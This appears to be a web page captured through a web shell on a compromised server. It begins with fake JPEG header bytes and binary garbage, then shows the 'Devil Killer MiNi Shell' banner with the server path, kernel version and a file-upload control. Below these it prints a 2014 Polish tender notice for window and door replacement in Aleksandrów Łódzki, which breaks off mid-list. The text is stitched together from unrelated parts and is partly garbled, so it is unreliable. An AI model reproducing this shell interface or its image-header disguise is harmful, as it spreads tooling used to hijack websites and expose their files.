JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140516/105883-N-2014.html

<p class="kh_header"><b>Aleksandrów Łódzki: WYMIANA STOLARKI OKIENNEJ  I DRZWIOWEJ  W BUDYNKACH ADMINISTROWANYCH PRZEZ ZAMAWIAJĄCEGO.</b><br>
<b>Numer ogłoszenia: 105883 - 2014; data zamieszczenia: 16.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "PGKiM" Sp. z o.o. , ul. 1 Maja 28/30, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121938, 7121194 w. 68, faks 042 7121178.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkimal.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka komunalna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYMIANA STOLARKI OKIENNEJ  I DRZWIOWEJ  W BUDYNKACH ADMINISTROWANYCH PRZEZ ZAMAWIAJĄCEGO..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I część przedmiotu zamówienia:
1) Wymiana stolarki okiennej na PCV w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 140 szt.,  stosownie do załącznika nr 1 do Umowy 6a, będącej częścią niniejszej specyfikacji.
W załączniku należy podać - wpisać cenę brutto na każdy adres oddzielnie.
Załącznik zawiera adresy lokali wraz z przybliżonymi wymiarami.
2) Okna zespolone w ramach wykonanych z PCV z możliwością rozszczelnienia,
- kolor biały,
- profil ze wzmocnieniem stalowym o grubości co najmniej 1,5 mm  6 - komorowy,
- szyby termoizolacyjne float  4/16/4 zespolone w ramce aluminiowej, 
- szyby spełniające wymagania  - współczynnik przenikania ciepła U= 1.1 W/m2 ciepła ramka, mikrowentylacja,
- przy oknach rozwieralnych i rozwieralno - uchylnych zawiasy wyposażone w regulacje,
- okucia w kolorze srebrnym, klamki w kolorze białym,
3) Zakres prac:
a)	demontaż starych okien,
b)	montaż nowych okien poprzez zakotwienie minimum 4 haków i wypełnienie pianką poliuretanową
c)	wykonanie obróbek ościeży (w różnym zakresie dobranym indywidualnie do każdego okna), oceny wymaganego zakresu prac oraz dokładnego obmiaru własnego należy dokonać na miejscu,
d)	montaż nawietrzaków okiennych ramowych na wszystkich oknach,
e)	montaż parapetów zewnętrznych przy wszystkich oknach.
II część przedmiotu zamówienia:
1) Wymiana stolarki okiennej  na okna drewniane w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 34 szt.,  stosownie do załącznika nr 1 do Umowy 6b, będącej częścią niniejszej specyfikacji.
W załączniku  należy podać - wpisać cenę brutto na każdy adres oddzielnie.
Załącznik zawiera adresy lokali wraz z przybliżonymi wymiarami.
2)	Okna drewniane jednoramowe z zespoloną szybą, podwójne. Okna winny być montowane w starej ościeżnicy okiennej skrzynkowej. Należy wykonać opaskę z listew szer. min. 10 cm wokół ościeżnicy, w zależności od potrzeb. Okna w kolorze białym. Przy oknach o wysokości powyżej 1,4 m należy zamontować baskwil pod listwą przymykową. Montaż okien winien być wykonany poprzez zakotwienie minimum 4 haków i doszczelnienie piankę poliuretanową. 
3)	Zakres prac:
a)	demontaż starych okien,
b)	montaż nowych okien poprzez zakotwienie minimum 4 haków i wypełnienie pianką poliuretanową
c)	wykonanie obróbek ościeży (w różnym zakresie dobranym indywidualnie do każdego okna), oceny wymaganego zakresu prac oraz dokładnego obmiaru własnego należy dokonać na miejscu,
d)	montaż nawietrzaków okiennych ramowych na wszystkich oknach,
e)	montaż parapetów zewnętrznych przy wszystkich oknach.

III część przedmiotu zamówienia:
1) Wymiana stolarki drzwiowej na drzwi drewniane w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 46 szt.,  stosownie do załącznika nr 1 do Umowy 6c, będącej częścią niniejszej specyfikacji.
W załączniku należy podać - wpisać cenę brutto na każdy adres oddzielnie.
Załącznik zawiera adresy lokali wraz z przybliżonymi wymiarami.
2)	Drzwi - konstrukcja: ramiak drewniany sosnowy 120x43 mm,  podwójnie obłożony klepką drewnianą 60x12 mm, wypełnienie pomiędzy klepkami styropianem o grubości 20 mm i folią paraizolacyjną, współczynnik przenikania ciepła U=1,5 W/(m2xK). Ościeżnica sosnowa  o przekroju 100/120x52 mm z uszczelką we wrębie i progiem. Wyposażenie 3 szt. zawiasów regulowanych, wizjer, zamek wpuszczany zapadkowo- zasuwowy z kompletem kluczy, klamka z szyldami. Malowanie: farby kryjące lub impregnaty i lakierobejce, drzwi zewnętrzne: impregnaty i dwukrotne malowanie lakierami.
3)	Zakres prac:
a)	 demontaż starych drzwi,
b)	 montaż nowych ościeży drzwiowych oraz regulacja skrzydeł drzwiowych,
c)	 wykonanie obróbek ościeży drzwiowych zaprawą tynkarską oraz zagruntowanie.

IV część przedmiotu zamówienia:
1) Wymiana drzwi drewnianych na drzwi stalowe w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 13 szt.,  stosownie do załącznika nr 1 do Umowy 6d, będącej częścią niniejszej specyfikacji.
W załączniku należy podać - wpisać cenę brutto na każdy adres oddzielnie.
2) Drzwi - skrzydło drzwiowe wzmocnione kształtownikiem z profilu typu C 43 mm o grubości ścianki 1,2 mm, obłożone blachą stalową odtłuszczoną - grubość 1,2 mm, wypełnienie pomiędzy blachą styropianem o grubości 40 mm współczynnik przenikania ciepła U=1,1 W/(m2xK). Uszczelka po obwodzie skrzydła drzwiowego. Naświetla wykonane z szyby bezpiecznej, podwójnie klejonej o wymiarach 30 x 60 cm w ramie z uszczelką. Ościeżnica z profilu uchowego o wymiarach 40 x 50mm z progiem stalowym. Mocowanie ościeży za pomocą prętów metalowych 10 wbijanych w mur i łączonych z ościeżnicą za pomocą spawu. Wyposażenie: zawiasy toczone 20 - 2 szt., zamek wpuszczany typ Yale z kompletem kluczy, klamka z szyldami, samozamykacz. Malowanie dwukrotne farbą poliwinylową (podkład i nawierzchniowa). 
3) Zakres prac:
a)	demontaż starych drzwi,
b)	montaż nowych ościeży drzwiowych poprzez zakotwienie haków i wypełnienie    pianką poliuretanową oraz regulacja skrzydeł drzwiowych,
c)	wykonanie obróbek ościeży drzwiowych zaprawą tynkarską oraz zagruntowanie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających. 
W przypadku  udzielenia, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy robót budowlanych  zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień, jeżeli zamówienie podstawowe zostało udzielone w trybie przetargu nieograniczonego, a zamówienie uzupełniające było przewidziane w ogłoszeniu o zamówieniu dla zamówienia podstawowego i jest zgodne z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 44.22.11.00-6, 45.42.11.32-8, 44.22.12.00-7, 45.42.11.31-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> I część postępowania przetargowego - 2.000,00 PLN (dwa tysiące  PLN) 
II część postępowania przetargowego - Zamawiający nie wymaga wniesienia wadium.
III część postępowania przetargowego - 2.200,00 PLN (dwa tysiące dwieście PLN) 
IV część postępowania przetargowego - Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca ma niezbędną do wykonania wiedzę i doświadczenie, do oferty należy dołączyć następujące dokumenty:
1) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów  potwierdzających, że roboty zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawcy winni udokumentować zrealizowanie przynajmniej jednej roboty budowlanej  o wartości min.  50.000,00 PLN brutto polegającej na wymianie okien  - dot. I części postępowania przetargowego.

2) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów  potwierdzających, że roboty zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawcy winni udokumentować zrealizowanie przynajmniej jednej roboty budowlanej  o wartości min. 30.000,00 PLN brutto, polegającej na wymianie okien na stolarkę drewnianą w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, oraz załączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - dot. II części postępowania przetargowego.

3) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów  potwierdzających, że roboty zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawcy winni udokumentować zrealizowanie przynajmniej jednej roboty budowlanej  o wartości min. 40.000,00 PLN brutto, polegającej na wymianie drzwi na stolarkę drewnianą w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, oraz załączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - dot. III części postępowania przetargowego.

4) Wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, z podaniem  ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów  potwierdzających, że roboty zostały wykonane w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Wykonawcy winni udokumentować zrealizowanie przynajmniej jednej roboty budowlanej  o wartości min. 20.000,00 PLN brutto, polegającej na wymianie drzwi stalowych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  - w tym okresie, oraz załączyć dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - dot. IV części postępowania przetargowego.
Ocena spełnienia wyżej opisanych warunków udziału w postępowaniu dokonywana będzie w oparciu o złożone przez Wykonawcę w niniejszym postępowaniu dokumenty oraz oświadczenia wg formuły: spełnia- nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca dysponuje odpowiednimi osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:
Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wszelkie wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, spełnienia warunków udziału w postępowaniu dotyczących sytuacji ekonomicznej i finansowej do oferty należy dołączyć następujące dokumenty:
1)Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000,00 PLN (brutto) - dot. I części postępowania przetargowego.
2)Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000,00 PLN (brutto) - dot. II części postępowania przetargowego.
3)Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 50.000,00 PLN (brutto) - dot. III części postępowania przetargowego.
4)Opłacona polisa, a w przypadku jej braku, inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 20.000,00 PLN (brutto) - dot. III części postępowania przetargowego.
5)Jeśli Wykonawca składa ofertę na trzy części postępowania przetargowego składa opłaconą polisę  potwierdzającą, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 170.000,00 (brutto)  PLN.
(Proszę dołączyć dokument potwierdzający iż ww. polisa jest opłacona)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ewentualne pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo Zamówień Publicznych przewiduje możliwość dokonania zmiany umowy w formie aneksów w niżej wymienionych przypadkach:
1.1 zmianę stawki VAT w stosunku do tej jaką zastosowano w cenie oferty, w przypadku zmiany przepisów o podatku VAT,
1.2 działania sił natury, uznanych za stan klęski żywiołowej.
2. Wyżej wymieniony przypadek dokonania zmiany umowy, może między innymi rzutować na zmianę terminu wykonania przedmiotu zamówienia, przy czym zaistniałe zdarzenie musi w sposób istotny i bezpośredni wpływać na możliwość realizacji prac w terminie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pgkimal.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGKiM Sp. z o. o.
ul. 1 Maja 28/30
95-070 Aleksandrów Łódzki
pok. nr 12..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2014 godzina 12:00, miejsce: PGKiM Sp. z o. o.
ul. 1 Maja 28/30
95-070 Aleksandrów Łódzki
SEKRETARIAT.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wymiana stolarki okiennej na PCV w budynkach administrowanych przez Zamawiającego w Aleksandrowie Łódzkim, w ilości 140 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Okna zespolone w ramach wykonanych z PCV z możliwością rozszczelnienia,
- kolor biały,
- profil ze wzmocnieniem stalowym o grubości co najmniej 1,5 mm  6 - komorowy,
- szyby termoizolacyjne float  4/16/4 zespolone w ramce aluminiowej, 
- szyby spełniające wymagania  - współczynnik przenikania ciepła U= 1.1 W/m2 ciepła ramka, mikrowentylacja,
- przy oknach rozwieralnych i rozwieralno - uchylnych zawiasy wyposażone w regulacje,
- okucia w kolorze srebrnym, klamki w kolorze białym,
Zakres prac:
a)	demontaż starych okien,
b)	montaż nowych okien poprzez zakotwienie minimum 4 haków i wypełnienie pianką poliuretanową
c)	wykonanie obróbek ościeży (w różnym zakresie dobranym indywidualnie do każdego okna), oceny wymaganego zakresu prac oraz dokładnego obmiaru własnego należy dokonać na miejscu,
d)	montaż nawietrzaków okiennych ramowych na wszystkich oknach,
e)	montaż parapetów zewnętrznych przy wszystkich oknach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.22.11.00-6, 45.42.11.32-8.</p></li>
